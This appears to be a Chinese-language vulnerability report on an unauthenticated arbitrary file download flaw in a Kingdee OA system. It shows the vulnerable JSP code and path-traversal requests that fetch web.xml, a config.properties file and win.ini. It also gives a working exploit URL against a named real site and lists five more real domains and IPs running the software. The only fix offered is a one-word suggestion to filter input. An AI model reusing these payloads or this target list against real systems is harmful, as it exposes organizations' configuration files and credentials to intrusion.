经测试发现,该系统存在任意文件下载,且无需登录
存在漏洞的文件:
/oa/admin/application/file_download.jsp?filePath=
http://x.x.x.x:7890/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml
/../oaconsole/config/config.properties
c:\windows\win.ini
部分漏洞代码为:
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%
String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");
String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");
String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");
java.io.OutputStream ou = null;
java.io.InputStream is = null;
try{
java.io.File logFile = new java.io.File(logPath);
if (logFile.exists()) {
is = new java.io.FileInputStream(logPath);
byte[] content = new byte[1024];
int i = 0;
response.setContentType(contentType);
ou = response.getOutputStream();
response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\"");
while ((i = is.read(content)) != -1) {
ou.write(content, 0, i);
}
ou.flush();
} else {
out.println("file not found:"+logPath);
}
} catch (Exception e) {
System.out.println(e);
} finally {
if (ou != null) ou.close();
if (is != null) is.close();
}
%>
很明显的任意文件下载漏洞,随便在网上找一个实例进行证明
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini
直接访问即可下载该文件了,保存的文件名为:file.txt
5个案例:
http://oa.xpngs.com/oa/themes/mskin/login/login.jsp
http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp
http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp
http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit
http://www.jrxoa.com/oa/themes/mskin/login/login.jsp
漏洞证明:
下载的文件
修复方案:
过滤吧
扫一扫
899
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
